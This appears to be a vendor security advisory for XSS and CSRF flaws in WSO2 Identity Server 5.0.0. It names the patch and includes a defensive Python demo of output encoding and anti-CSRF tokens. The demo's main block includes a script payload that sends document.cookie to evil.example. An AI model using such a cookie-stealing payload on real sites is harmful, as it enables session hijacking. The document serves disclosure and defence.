The WSO2 Identity Server 5.0.0 is vulnerable to XSS and CSRF attacks.
Severity: CRITICAL - Patch Immediately.
XSS enables attackers to inject client-side script into web pages viewed by other users. CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.
XSS: Because the injected script runs in the victim's browser with the origin of the vulnerable site, it can be used by attackers to bypass access controls such as the same-origin policy.
CSRF: Malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts; the browser attaches the victim's session cookie to a request that an attacker's page initiated.
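The two attack classes named above, shown as an added illustration that is not WSO2 code and does not reproduce the specific defects fixed by the patch (this advisory does not describe them). The page handler, the `Session` class and the `/change-password` form are hypothetical; the request bodies are constructed inline. The first pair of functions reflects a parameter into HTML without and with output encoding (XSS); the handler then processes the same forged cross-site request once while trusting the session cookie alone and once while also requiring a per-session token (CSRF).

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlencode


def render_greeting_vulnerable(name: str) -> str:
    """Reflects a request parameter into the page without encoding (reflected XSS)."""
    return f"<p>Welcome, {name}!</p>"


def render_greeting_hardened(name: str) -> str:
    """Same page with HTML-body output encoding applied to the untrusted value."""
    return f"<p>Welcome, {html.escape(name, quote=True)}!</p>"


class Session:
    """Hypothetical server-side session; the anti-CSRF token lives here, not in the cookie."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_urlsafe(32)
        self.password = "original"


def change_password(session: Session, form_body: str, require_token: bool) -> int:
    """Handle a POST to the hypothetical /change-password endpoint.

    The caller has already resolved the session cookie to `session`. Returns an
    HTTP status code. With require_token=False the handler trusts the cookie
    alone, which is exactly what CSRF abuses.
    """
    form = parse_qs(form_body)
    if require_token:
        supplied = form.get("csrf_token", [""])[0]
        # Constant-time comparison so the check does not leak the token byte by byte.
        if not hmac.compare_digest(supplied, session.csrf_token):
            return 403
    new_password = form.get("new_password", [""])[0]
    if not new_password:
        return 400
    session.password = new_password
    return 200


def csrf_demo() -> dict:
    """Replays one forged request against the unprotected and the protected handler."""
    # Constructed attacker request: an auto-submitting form on a third-party site
    # cannot read the victim's csrf_token (same-origin policy), so it is absent.
    forged_body = urlencode({"new_password": "attacker-chosen"})

    victim = Session()
    unprotected_status = change_password(victim, forged_body, require_token=False)
    unprotected_password = victim.password

    victim = Session()
    protected_status = change_password(victim, forged_body, require_token=True)
    protected_password = victim.password

    # A legitimate same-origin form carries the token the server embedded in the page.
    legit_body = urlencode({"new_password": "user-chosen", "csrf_token": victim.csrf_token})
    legit_status = change_password(victim, legit_body, require_token=True)

    return {
        "unprotected_status": unprotected_status,
        "unprotected_password": unprotected_password,
        "protected_status": protected_status,
        "protected_password": protected_password,
        "legit_status": legit_status,
        "legit_password": victim.password,
    }


if __name__ == "__main__":
    payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    print(render_greeting_vulnerable(payload))
    print(render_greeting_hardened(payload))
    print(csrf_demo())
```

The forged request succeeds (200, password replaced) when only the cookie is checked and is rejected (403, password unchanged) once the synchronizer token is required, while the legitimate same-origin submission still succeeds. Output encoding must match the context the value lands in; `html.escape` is correct for the HTML body and attribute values but not for a JavaScript string or a URL.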
Apply the patch WSO2-CARBON-PATCH-4.2.0-1256. Follow the instructions in the README file.
Note: Make sure to apply IS Service Pack 1 (WSO2-IS-5.0.0-SP01) before applying the above security patch.
WSO2 thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.